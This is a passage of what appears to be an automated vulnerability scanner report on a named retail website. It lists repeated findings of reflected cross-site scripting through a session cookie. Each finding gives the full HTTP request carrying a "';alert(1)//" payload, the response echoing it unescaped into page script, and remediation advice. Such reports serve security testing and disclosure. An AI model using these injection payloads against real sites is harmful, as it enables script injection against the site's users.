Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C4748f'%3balert(1)//b29ffd2f072; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:10:29 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:10:29 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 120128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|4748f';alert(1)//b29ffd2f072');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.45. http://www.ebags.com/category/clutches/20048616 [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/clutches/20048616

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9fe4'%3balert(1)//0d5903b01c5 was submitted in the SPLITSESSION cookie. This input was echoed as f9fe4';alert(1)//0d5903b01c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/clutches/20048616 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cf9fe4'%3balert(1)//0d5903b01c5; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:10:30 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:10:30 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 95979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|f9fe4';alert(1)//0d5903b01c5');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.46. http://www.ebags.com/category/cross-body-bags/20037212 [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/cross-body-bags/20037212

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c47a3'%3balert(1)//6f93ab58282 was submitted in the SPLITSESSION cookie. This input was echoed as c47a3';alert(1)//6f93ab58282 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/cross-body-bags/20037212 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cc47a3'%3balert(1)//6f93ab58282; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:11:06 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:11:06 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 116098


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|c47a3';alert(1)//6f93ab58282');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.47. http://www.ebags.com/category/handbags/10014 [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/handbags/10014

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3566e'%3balert(1)//65eaa91922f was submitted in the SPLITSESSION cookie. This input was echoed as 3566e';alert(1)//65eaa91922f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/handbags/10014 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C3566e'%3balert(1)//65eaa91922f; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:10:10 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:10:10 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 117519


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|3566e';alert(1)//65eaa91922f');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.48. http://www.ebags.com/category/handbags/10014/h/sale [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/handbags/10014/h/sale

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b247d'%3balert(1)//b7b3987c633 was submitted in the SPLITSESSION cookie. This input was echoed as b247d';alert(1)//b7b3987c633 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/handbags/10014/h/sale HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cb247d'%3balert(1)//b7b3987c633; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:10:07 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:10:07 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 118415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|b247d';alert(1)//b7b3987c633');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.49. http://www.ebags.com/category/hobos/20036674 [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/hobos/20036674

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35db9'%3balert(1)//174c2a7b538 was submitted in the SPLITSESSION cookie. This input was echoed as 35db9';alert(1)//174c2a7b538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/hobos/20036674 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C35db9'%3balert(1)//174c2a7b538; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:11:05 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:11:05 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 113981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|35db9';alert(1)//174c2a7b538');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.50. http://www.ebags.com/category/hobos/20048614 [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/hobos/20048614

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36c7b'%3balert(1)//46d70b3c5ca was submitted in the SPLITSESSION cookie. This input was echoed as 36c7b';alert(1)//46d70b3c5ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/hobos/20048614 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C36c7b'%3balert(1)//46d70b3c5ca; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:10:55 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:10:55 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|36c7b';alert(1)//46d70b3c5ca');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.51. http://www.ebags.com/department/backpacks [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/backpacks

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce005'%3balert(1)//2bba8979327 was submitted in the SPLITSESSION cookie. This input was echoed as ce005';alert(1)//2bba8979327 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/backpacks HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cce005'%3balert(1)//2bba8979327; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:44 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:44 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 72517


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|ce005';alert(1)//2bba8979327');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.52. http://www.ebags.com/department/bags-by-ebags [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/bags-by-ebags

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daeeb'%3balert(1)//84748baca02 was submitted in the SPLITSESSION cookie. This input was echoed as daeeb';alert(1)//84748baca02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/bags-by-ebags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cdaeeb'%3balert(1)//84748baca02; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:15 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:15 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 59464


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|daeeb';alert(1)//84748baca02');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.53. http://www.ebags.com/department/business-and-laptop [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/business-and-laptop

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2144'%3balert(1)//62264d29455 was submitted in the SPLITSESSION cookie. This input was echoed as e2144';alert(1)//62264d29455 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/business-and-laptop HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Ce2144'%3balert(1)//62264d29455; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:03 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
